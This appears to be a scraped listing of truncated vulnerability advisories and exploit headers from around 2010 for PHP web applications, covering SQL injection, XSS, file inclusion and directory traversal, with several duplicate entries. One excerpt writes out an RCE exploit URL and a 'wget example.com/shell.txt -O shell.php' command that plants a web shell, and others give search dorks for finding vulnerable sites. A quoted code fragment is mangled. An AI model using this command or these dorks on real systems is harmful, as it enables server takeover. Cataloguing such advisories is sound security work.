CVE-2010-1353

Directory traversal vulnerability in the LoginBox Pro comloginbox component for Joomla! allows remote attackers to read arbitrary files via a .. dot dot in the view parameter to index.php...

Zomplog 3.9 XSS exploit-vulnerability warning-the black bar safety net

漏洞 文件 index.php Vulnerability code: 1 0: // some general xxs protection 1 1: $GET’search’ = strreplace’script’, ’, $GET’search’; 1 2: $GET’username’ = strreplace’script’, ’, $GET’username’; Code just remove the script file keyword, the page is vulnerable toXSSattack POC...

AuroraGPT 4.0 - Remote Code Execution

Title : AuroraGPT V4 RCE Vulnerability Author: Amoo Arash Date : 2010-04-11 Version : 4 InformatioN Title : AuroraGPT V4 RCE Vulnerability Author : Amoo Arash ExploiT Vulnerable File : http://127.0.0.1/index.php?view=help&faq=1&ref&cmd=Command ExploiT : wget example.com/shell.txt -O shell.php...

Zomplog 3.9 XSS Vulnerability

Exploit for php platform in category web applications ============================= Zomplog 3.9 XSS Vulnerability ============================= Title: Zomplog 3.9 XSS Vendor: http://www.zomp.nl Dork: "Powered by Zomplog" AUTHOR: ITSecTeam Email: email protected Website: http://www.itsecteam.com...

Directory traversal

Directory traversal vulnerability in the Cookex Agency CKForms comckforms component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. dot dot in the controller parameter to index.php...

Sql injection

SQL injection vulnerability in index.php in Systemsoftware Community Black Forum allows remote attackers to execute arbitrary SQL commands via the sflaeche parameter...

MKPortal Recommend module XSS Vulnerability

=========================================== MKPortal Recommend module XSS Vulnerability =========================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' /' / /' 0 0 /, // ,/ / 1 1 // /' / // /' / /' 0 0 / / / / / / 1 1 / / 0 0 ////// //...

Directory traversal

Directory traversal vulnerability in Irmin CMS formerly Pepsi CMS 0.6 BETA2 allows remote attackers to read arbitrary files via a .. dot dot in the w parameter to index.php...

Sql injection

SQL injection vulnerability in index.php in Yamamah aka Dove Photo Album 1.00 allows remote attackers to execute arbitrary SQL commands via the calbums parameter...

CVE-2010-1300

SQL injection vulnerability in index.php in Yamamah aka Dove Photo Album 1.00 allows remote attackers to execute arbitrary SQL commands via the calbums parameter...

CVE-2010-1300

SQL injection vulnerability in index.php in Yamamah aka Dove Photo Album 1.00 allows remote attackers to execute arbitrary SQL commands via the calbums parameter...

CVE-2010-1300

The CVE-2010-1300 entry documents a SQL injection in Yamamah (aka Dove Photo Album) 1.00, exploitable via the calbums parameter in index.php. The underlying issue is improper handling of user-supplied input, allowing an attacker to inject arbitrary SQL commands. Impact as described aligns with pa...

Joomla VJDEO 1.0 Local File Inclusion

o=====================================================================================o Joomla Component VJDEO 1.0 LFI Vulnerability Vendor : http://www.joomla.ternaria.com/ Author : Angela Zhang Contact : [email protected] Date : 07 - April - 2010...

MKPortal lenta module XSS Vulnerability

======================================= MKPortal lenta module XSS Vulnerability ======================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' /' / /' 0 0 /, // ,/ / 1 1 // /' / // /' / /' 0 0 / / / / / / 1 1 / / 0 0 ////// // // // // //...

MKPortal whois module XSS Vulnerability

======================================= MKPortal whois module XSS Vulnerability ======================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' /' / /' 0 0 /, // ,/ / 1 1 // /' / // /' / /' 0 0 / / / / / / 1 1 / / 0 0 ////// // // // // //...

JaxCMS 'index.php' Local File Inclusion Vulnerability

JaxCMS is prone to local file inclusion vulnerability. SPDX-FileCopyrightText: 2010 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

INVOhost SQL Injection

Andrés Gómez Exploit Title : INVOhost SQL Injection Date : 2010-04-24 Author : Andrés Gómez Software Link : http://www.invohost.com/ Contact : [email protected] Dork : "Powered by INVOhost" An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the...

SuperNews (index.php) SQL Injection Vulnerability

Exploit for php platform in category web applications ================================================= SuperNews index.php SQL Injection Vulnerability ================================================= SuperNews index.php SQL Injection Vulnerability Author : d4rk-h4ck3r Tunisian Security Team Dor...

Cross site scripting

Cross-site scripting XSS vulnerability in the forum page in Web Server Creator - Web Portal 0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors to index.php...

Sql injection

Multiple SQL injection vulnerabilities in index.php in phpMySport 1.4, when magicquotesgpc is disabled, allow remote attackers to execute arbitrary SQL commands via the 1 v2 parameter in a member view action, 2 v1 parameter in a news action, 3 v1 parameter in an information action, 4 v2 parameter...